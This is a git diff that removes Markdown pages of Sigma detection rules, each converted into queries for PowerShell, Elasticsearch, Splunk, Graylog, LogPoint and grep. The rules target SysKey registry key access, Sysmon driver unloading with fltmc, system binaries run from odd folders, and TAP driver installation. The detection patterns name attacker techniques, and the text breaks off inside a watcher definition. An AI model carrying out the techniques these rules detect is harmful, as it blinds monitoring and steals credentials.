-Get-WinEvent -LogName Security | where {(($_.ID -eq "4656" -or $_.ID -eq "4663") -and $_.message -match "ObjectType.*key" -and ($_.message -match "ObjectName.*.*lsa\\JD" -or $_.message -match "ObjectName.*.*lsa\\GBG" -or $_.message -match "ObjectName.*.*lsa\\Skew1" -or $_.message -match "ObjectName.*.*lsa\\Data")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:("4656" OR "4663") AND winlog.event_data.ObjectType:"key" AND winlog.event_data.ObjectName.keyword:(*lsa\\JD OR *lsa\\GBG OR *lsa\\Skew1 OR *lsa\\Data))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/9a4ff3b8-6187-4fd2-8e8b-e0eae1129495 <<EOF
-{
-  "metadata": {
-    "title": "SysKey Registry Keys Access",
-    "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey",
-    "tags": [
-      "attack.discovery",
-      "attack.t1012"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:(\"4656\" OR \"4663\") AND winlog.event_data.ObjectType:\"key\" AND winlog.event_data.ObjectName.keyword:(*lsa\\\\JD OR *lsa\\\\GBG OR *lsa\\\\Skew1 OR *lsa\\\\Data))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:(\"4656\" OR \"4663\") AND winlog.event_data.ObjectType:\"key\" AND winlog.event_data.ObjectName.keyword:(*lsa\\\\JD OR *lsa\\\\GBG OR *lsa\\\\Skew1 OR *lsa\\\\Data))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'SysKey Registry Keys Access'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:("4656" "4663") AND ObjectType:"key" AND ObjectName.keyword:(*lsa\\JD *lsa\\GBG *lsa\\Skew1 *lsa\\Data))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (EventCode="4656" OR EventCode="4663") ObjectType="key" (ObjectName="*lsa\\JD" OR ObjectName="*lsa\\GBG" OR ObjectName="*lsa\\Skew1" OR ObjectName="*lsa\\Data"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id IN ["4656", "4663"] ObjectType="key" ObjectName IN ["*lsa\\JD", "*lsa\\GBG", "*lsa\\Skew1", "*lsa\\Data"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*4656|.*4663))(?=.*key)(?=.*(?:.*.*lsa\JD|.*.*lsa\GBG|.*.*lsa\Skew1|.*.*lsa\Data)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_sysmon_driver_unload.md b/Atomic_Threat_Coverage/Detection_Rules/win_sysmon_driver_unload.md
deleted file mode 100644
index 5d99507..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_sysmon_driver_unload.md
+++ /dev/null
@@ -1,173 +0,0 @@
-| Title                    | Sysmon Driver Unload       |
-|:-------------------------|:------------------|
-| **Description**          | Detect possible Sysmon driver unload |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon](https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon)</li></ul>  |
-| **Author**               | Kirill Kiryanov, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Sysmon Driver Unload
-id: 4d7cda18-1b12-4e52-b45c-d28653210df8
-status: experimental
-author: Kirill Kiryanov, oscd.community
-description: Detect possible Sysmon driver unload
-date: 2019/10/23
-modified: 2019/11/07
-references:
-    - https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon
-logsource:
-    product: windows
-    category: process_creation
-detection:
-    selection:
-        Image|endswith: '\fltmc.exe'
-        CommandLine|contains|all:
-            - 'unload'
-            - 'sys'
-    condition: selection
-falsepositives: 
-    - Unknown
-level: high
-fields:
-    - CommandLine
-    - Details
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\fltmc.exe" -and $_.message -match "CommandLine.*.*unload.*" -and $_.message -match "CommandLine.*.*sys.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\fltmc.exe AND winlog.event_data.CommandLine.keyword:*unload* AND winlog.event_data.CommandLine.keyword:*sys*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/4d7cda18-1b12-4e52-b45c-d28653210df8 <<EOF
-{
-  "metadata": {
-    "title": "Sysmon Driver Unload",
-    "description": "Detect possible Sysmon driver unload",
-    "tags": "",
-    "query": "(winlog.event_data.Image.keyword:*\\\\fltmc.exe AND winlog.event_data.CommandLine.keyword:*unload* AND winlog.event_data.CommandLine.keyword:*sys*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\fltmc.exe AND winlog.event_data.CommandLine.keyword:*unload* AND winlog.event_data.CommandLine.keyword:*sys*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Sysmon Driver Unload'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nCommandLine = {{_source.CommandLine}}\n    Details = {{_source.Details}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\fltmc.exe AND CommandLine.keyword:*unload* AND CommandLine.keyword:*sys*)
-```
-
-
-### splunk
-    
-```
-(Image="*\\fltmc.exe" CommandLine="*unload*" CommandLine="*sys*") | table CommandLine,Details
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\fltmc.exe" CommandLine="*unload*" CommandLine="*sys*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\fltmc\.exe)(?=.*.*unload.*)(?=.*.*sys.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_system_exe_anomaly.md b/Atomic_Threat_Coverage/Detection_Rules/win_system_exe_anomaly.md
deleted file mode 100644
index ae63ae2..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_system_exe_anomaly.md
+++ /dev/null
@@ -1,208 +0,0 @@
-| Title                    | System File Execution Location Anomaly       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a Windows program executable started in a suspicious folder |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0001_4688_windows_process_creation](../Data_Needed/DN0001_4688_windows_process_creation.md)</li><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Exotic software</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/GelosSnake/status/934900723426439170](https://twitter.com/GelosSnake/status/934900723426439170)</li></ul>  |
-| **Author**               | Florian Roth, Patrick Bareiss |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: System File Execution Location Anomaly
-id: e4a6b256-3e47-40fc-89d2-7a477edd6915
-status: experimental
-description: Detects a Windows program executable started in a suspicious folder
-references:
-    - https://twitter.com/GelosSnake/status/934900723426439170
-author: Florian Roth, Patrick Bareiss
-date: 2017/11/27
-tags:
-    - attack.defense_evasion
-    - attack.t1036
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image:
-            - '*\svchost.exe'
-            - '*\rundll32.exe'
-            - '*\services.exe'
-            - '*\powershell.exe'
-            - '*\regsvr32.exe'
-            - '*\spoolsv.exe'
-            - '*\lsass.exe'
-            - '*\smss.exe'
-            - '*\csrss.exe'
-            - '*\conhost.exe'
-            - '*\wininit.exe'
-            - '*\lsm.exe'
-            - '*\winlogon.exe'
-            - '*\explorer.exe'
-            - '*\taskhost.exe'
-            - '*\Taskmgr.exe'
-            - '*\sihost.exe'
-            - '*\RuntimeBroker.exe'
-            - '*\smartscreen.exe'
-            - '*\dllhost.exe'
-            - '*\audiodg.exe'
-            - '*\wlanext.exe'
-    filter:
-        Image:
-            - 'C:\Windows\System32\\*'
-            - 'C:\Windows\system32\\*'
-            - 'C:\Windows\SysWow64\\*'
-            - 'C:\Windows\SysWOW64\\*'
-            - 'C:\Windows\explorer.exe'
-            - 'C:\Windows\winsxs\\*'
-            - 'C:\Windows\WinSxS\\*'
-            - '\SystemRoot\System32\\*'
-    condition: selection and not filter
-fields:
-    - ComputerName
-    - User
-    - Image
-falsepositives:
-    - Exotic software
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\svchost.exe" -or $_.message -match "Image.*.*\\rundll32.exe" -or $_.message -match "Image.*.*\\services.exe" -or $_.message -match "Image.*.*\\powershell.exe" -or $_.message -match "Image.*.*\\regsvr32.exe" -or $_.message -match "Image.*.*\\spoolsv.exe" -or $_.message -match "Image.*.*\\lsass.exe" -or $_.message -match "Image.*.*\\smss.exe" -or $_.message -match "Image.*.*\\csrss.exe" -or $_.message -match "Image.*.*\\conhost.exe" -or $_.message -match "Image.*.*\\wininit.exe" -or $_.message -match "Image.*.*\\lsm.exe" -or $_.message -match "Image.*.*\\winlogon.exe" -or $_.message -match "Image.*.*\\explorer.exe" -or $_.message -match "Image.*.*\\taskhost.exe" -or $_.message -match "Image.*.*\\Taskmgr.exe" -or $_.message -match "Image.*.*\\sihost.exe" -or $_.message -match "Image.*.*\\RuntimeBroker.exe" -or $_.message -match "Image.*.*\\smartscreen.exe" -or $_.message -match "Image.*.*\\dllhost.exe" -or $_.message -match "Image.*.*\\audiodg.exe" -or $_.message -match "Image.*.*\\wlanext.exe") -and  -not (($_.message -match "Image.*C:\\Windows\\System32\\.*" -or $_.message -match "Image.*C:\\Windows\\system32\\.*" -or $_.message -match "Image.*C:\\Windows\\SysWow64\\.*" -or $_.message -match "Image.*C:\\Windows\\SysWOW64\\.*" -or $_.message -match "C:\\Windows\\explorer.exe" -or $_.message -match "Image.*C:\\Windows\\winsxs\\.*" -or $_.message -match "Image.*C:\\Windows\\WinSxS\\.*" -or $_.message -match "Image.*\\SystemRoot\\System32\\.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:(*\\svchost.exe OR *\\rundll32.exe OR *\\services.exe OR *\\powershell.exe OR *\\regsvr32.exe OR *\\spoolsv.exe OR *\\lsass.exe OR *\\smss.exe OR *\\csrss.exe OR *\\conhost.exe OR *\\wininit.exe OR *\\lsm.exe OR *\\winlogon.exe OR *\\explorer.exe OR *\\taskhost.exe OR *\\Taskmgr.exe OR *\\sihost.exe OR *\\RuntimeBroker.exe OR *\\smartscreen.exe OR *\\dllhost.exe OR *\\audiodg.exe OR *\\wlanext.exe) AND (NOT (winlog.event_data.Image.keyword:(C\:\\Windows\\System32\\* OR C\:\\Windows\\system32\\* OR C\:\\Windows\\SysWow64\\* OR C\:\\Windows\\SysWOW64\\* OR C\:\\Windows\\explorer.exe OR C\:\\Windows\\winsxs\\* OR C\:\\Windows\\WinSxS\\* OR \\SystemRoot\\System32\\*))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/e4a6b256-3e47-40fc-89d2-7a477edd6915 <<EOF
-{
-  "metadata": {
-    "title": "System File Execution Location Anomaly",
-    "description": "Detects a Windows program executable started in a suspicious folder",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1036"
-    ],
-    "query": "(winlog.event_data.Image.keyword:(*\\\\svchost.exe OR *\\\\rundll32.exe OR *\\\\services.exe OR *\\\\powershell.exe OR *\\\\regsvr32.exe OR *\\\\spoolsv.exe OR *\\\\lsass.exe OR *\\\\smss.exe OR *\\\\csrss.exe OR *\\\\conhost.exe OR *\\\\wininit.exe OR *\\\\lsm.exe OR *\\\\winlogon.exe OR *\\\\explorer.exe OR *\\\\taskhost.exe OR *\\\\Taskmgr.exe OR *\\\\sihost.exe OR *\\\\RuntimeBroker.exe OR *\\\\smartscreen.exe OR *\\\\dllhost.exe OR *\\\\audiodg.exe OR *\\\\wlanext.exe) AND (NOT (winlog.event_data.Image.keyword:(C\\:\\\\Windows\\\\System32\\\\* OR C\\:\\\\Windows\\\\system32\\\\* OR C\\:\\\\Windows\\\\SysWow64\\\\* OR C\\:\\\\Windows\\\\SysWOW64\\\\* OR C\\:\\\\Windows\\\\explorer.exe OR C\\:\\\\Windows\\\\winsxs\\\\* OR C\\:\\\\Windows\\\\WinSxS\\\\* OR \\\\SystemRoot\\\\System32\\\\*))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:(*\\\\svchost.exe OR *\\\\rundll32.exe OR *\\\\services.exe OR *\\\\powershell.exe OR *\\\\regsvr32.exe OR *\\\\spoolsv.exe OR *\\\\lsass.exe OR *\\\\smss.exe OR *\\\\csrss.exe OR *\\\\conhost.exe OR *\\\\wininit.exe OR *\\\\lsm.exe OR *\\\\winlogon.exe OR *\\\\explorer.exe OR *\\\\taskhost.exe OR *\\\\Taskmgr.exe OR *\\\\sihost.exe OR *\\\\RuntimeBroker.exe OR *\\\\smartscreen.exe OR *\\\\dllhost.exe OR *\\\\audiodg.exe OR *\\\\wlanext.exe) AND (NOT (winlog.event_data.Image.keyword:(C\\:\\\\Windows\\\\System32\\\\* OR C\\:\\\\Windows\\\\system32\\\\* OR C\\:\\\\Windows\\\\SysWow64\\\\* OR C\\:\\\\Windows\\\\SysWOW64\\\\* OR C\\:\\\\Windows\\\\explorer.exe OR C\\:\\\\Windows\\\\winsxs\\\\* OR C\\:\\\\Windows\\\\WinSxS\\\\* OR \\\\SystemRoot\\\\System32\\\\*))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'System File Execution Location Anomaly'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n        User = {{_source.User}}\n       Image = {{_source.Image}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:(*\\svchost.exe *\\rundll32.exe *\\services.exe *\\powershell.exe *\\regsvr32.exe *\\spoolsv.exe *\\lsass.exe *\\smss.exe *\\csrss.exe *\\conhost.exe *\\wininit.exe *\\lsm.exe *\\winlogon.exe *\\explorer.exe *\\taskhost.exe *\\Taskmgr.exe *\\sihost.exe *\\RuntimeBroker.exe *\\smartscreen.exe *\\dllhost.exe *\\audiodg.exe *\\wlanext.exe) AND (NOT (Image.keyword:(C\:\\Windows\\System32\\* C\:\\Windows\\system32\\* C\:\\Windows\\SysWow64\\* C\:\\Windows\\SysWOW64\\* C\:\\Windows\\explorer.exe C\:\\Windows\\winsxs\\* C\:\\Windows\\WinSxS\\* \\SystemRoot\\System32\\*))))
-```
-
-
-### splunk
-    
-```
-((Image="*\\svchost.exe" OR Image="*\\rundll32.exe" OR Image="*\\services.exe" OR Image="*\\powershell.exe" OR Image="*\\regsvr32.exe" OR Image="*\\spoolsv.exe" OR Image="*\\lsass.exe" OR Image="*\\smss.exe" OR Image="*\\csrss.exe" OR Image="*\\conhost.exe" OR Image="*\\wininit.exe" OR Image="*\\lsm.exe" OR Image="*\\winlogon.exe" OR Image="*\\explorer.exe" OR Image="*\\taskhost.exe" OR Image="*\\Taskmgr.exe" OR Image="*\\sihost.exe" OR Image="*\\RuntimeBroker.exe" OR Image="*\\smartscreen.exe" OR Image="*\\dllhost.exe" OR Image="*\\audiodg.exe" OR Image="*\\wlanext.exe") NOT ((Image="C:\\Windows\\System32\\*" OR Image="C:\\Windows\\system32\\*" OR Image="C:\\Windows\\SysWow64\\*" OR Image="C:\\Windows\\SysWOW64\\*" OR Image="C:\\Windows\\explorer.exe" OR Image="C:\\Windows\\winsxs\\*" OR Image="C:\\Windows\\WinSxS\\*" OR Image="\\SystemRoot\\System32\\*"))) | table ComputerName,User,Image
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*\\svchost.exe", "*\\rundll32.exe", "*\\services.exe", "*\\powershell.exe", "*\\regsvr32.exe", "*\\spoolsv.exe", "*\\lsass.exe", "*\\smss.exe", "*\\csrss.exe", "*\\conhost.exe", "*\\wininit.exe", "*\\lsm.exe", "*\\winlogon.exe", "*\\explorer.exe", "*\\taskhost.exe", "*\\Taskmgr.exe", "*\\sihost.exe", "*\\RuntimeBroker.exe", "*\\smartscreen.exe", "*\\dllhost.exe", "*\\audiodg.exe", "*\\wlanext.exe"]  -(Image IN ["C:\\Windows\\System32\\*", "C:\\Windows\\system32\\*", "C:\\Windows\\SysWow64\\*", "C:\\Windows\\SysWOW64\\*", "C:\\Windows\\explorer.exe", "C:\\Windows\\winsxs\\*", "C:\\Windows\\WinSxS\\*", "\\SystemRoot\\System32\\*"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\svchost\.exe|.*.*\rundll32\.exe|.*.*\services\.exe|.*.*\powershell\.exe|.*.*\regsvr32\.exe|.*.*\spoolsv\.exe|.*.*\lsass\.exe|.*.*\smss\.exe|.*.*\csrss\.exe|.*.*\conhost\.exe|.*.*\wininit\.exe|.*.*\lsm\.exe|.*.*\winlogon\.exe|.*.*\explorer\.exe|.*.*\taskhost\.exe|.*.*\Taskmgr\.exe|.*.*\sihost\.exe|.*.*\RuntimeBroker\.exe|.*.*\smartscreen\.exe|.*.*\dllhost\.exe|.*.*\audiodg\.exe|.*.*\wlanext\.exe))(?=.*(?!.*(?:.*(?=.*(?:.*C:\Windows\System32\\.*|.*C:\Windows\system32\\.*|.*C:\Windows\SysWow64\\.*|.*C:\Windows\SysWOW64\\.*|.*C:\Windows\explorer\.exe|.*C:\Windows\winsxs\\.*|.*C:\Windows\WinSxS\\.*|.*\SystemRoot\System32\\.*))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_tap_driver_installation.md b/Atomic_Threat_Coverage/Detection_Rules/win_tap_driver_installation.md
deleted file mode 100644
index 53d475b..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_tap_driver_installation.md
+++ /dev/null
@@ -1,351 +0,0 @@
-| Title                    | Tap Driver Installation       |
-|:-------------------------|:------------------|
-| **Description**          | Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0010: Exfiltration](https://attack.mitre.org/tactics/TA0010)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1048: Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1048: Exfiltration Over Alternative Protocol](../Triggers/T1048.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate OpenVPN TAP insntallation</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Daniil Yugoslavskiy, Ian Davis, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-action: global
-title: Tap Driver Installation
-id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9
-description: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques
-status: experimental
-author: Daniil Yugoslavskiy, Ian Davis, oscd.community
-date: 2019/10/24
-tags:
-    - attack.exfiltration
-    - attack.t1048
-falsepositives:
-    - Legitimate OpenVPN TAP insntallation
-level: medium
-detection:
-    selection_1:
-        ImagePath|contains: 'tap0901'
-    condition: selection and selection_1
----
-logsource:
-    product: windows
-    service: system
-detection:
-    selection:
-        EventID: 7045
----
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    selection:
-        EventID: 6
----
- logsource:
-     product: windows
-     service: security
- detection:
-     selection:
-         EventID: 4697
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName System | where {($_.ID -eq "7045" -and $_.message -match "ImagePath.*.*tap0901.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "6" -and $_.message -match "ImagePath.*.*tap0901.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-Get-WinEvent -LogName Security | where {($_.ID -eq "4697" -and $_.message -match "ImagePath.*.*tap0901.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"7045" AND winlog.event_data.ImagePath.keyword:*tap0901*)
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"6" AND winlog.event_data.ImagePath.keyword:*tap0901*)
-(winlog.channel:"Security" AND winlog.event_id:"4697" AND winlog.event_data.ImagePath.keyword:*tap0901*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 <<EOF
-{
-  "metadata": {
-    "title": "Tap Driver Installation",
-    "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques",
-    "tags": [
-      "attack.exfiltration",
-      "attack.t1048"
-    ],
-    "query": "(winlog.event_id:\"7045\" AND winlog.event_data.ImagePath.keyword:*tap0901*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"7045\" AND winlog.event_data.ImagePath.keyword:*tap0901*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Tap Driver Installation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/8e4cf0e5-aa5d-4dc3-beff-dc26917744a9-2 <<EOF
-{
-  "metadata": {
-    "title": "Tap Driver Installation",
-    "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques",
-    "tags": [
-      "attack.exfiltration",
-      "attack.t1048"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"6\" AND winlog.event_data.ImagePath.keyword:*tap0901*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"6\" AND winlog.event_data.ImagePath.keyword:*tap0901*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Tap Driver Installation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/8e4cf0e5-aa5d-4dc3-beff-dc26917744a9-3 <<EOF
-{
-  "metadata": {
-    "title": "Tap Driver Installation",
-    "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques",
-    "tags": [
-      "attack.exfiltration",
-      "attack.t1048"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4697\" AND winlog.event_data.ImagePath.keyword:*tap0901*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4697\" AND winlog.event_data.ImagePath.keyword:*tap0901*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
